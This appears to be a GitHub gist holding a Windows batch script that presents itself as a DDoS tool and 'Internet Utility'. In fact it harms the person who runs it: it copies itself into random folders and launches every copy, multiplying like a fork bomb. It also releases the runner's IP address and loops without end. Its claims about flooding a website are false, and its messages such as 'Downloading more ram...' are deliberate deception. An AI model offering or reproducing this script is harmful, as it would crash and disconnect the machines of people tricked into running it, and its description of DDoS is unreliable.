Created
July 24, 2014 02:19
-
-
Save Announcement/f89bed7291144ab95aef to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SET WEBSITE = google.com | |
| :BeginDdos | |
| echo What it does: | |
| echo pings localhost for nearest working internet connection | |
| echo releases their ip address | |
| echo throws all of the activity on the network at the website | |
| echo Renews your internet activity to work again | |
| echo repeats if needed | |
| cls | |
| :Trial | |
| SET X=%RANDOM% | |
| mkdir %X% | |
| copy hacking.bat %X% | |
| cd %X% | |
| title Internet Utility | |
| echo Searching for nearest service provider... | |
| echo Downloading more ram... | |
| start hacking | |
| ping localhost > nul | |
| ipconfig /release > nul | |
| echo Reconnecting to internet | |
| ping localhost -n 1000 >nul | |
| ping %WEBSITE% | |
| ipconfig /renew | |
| echo Test to see if working | |
| ping localhost -n 3 > nul | |
| color 9f | |
| cls | |
| ping localhost -n 3 | |
| goto :Trial |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment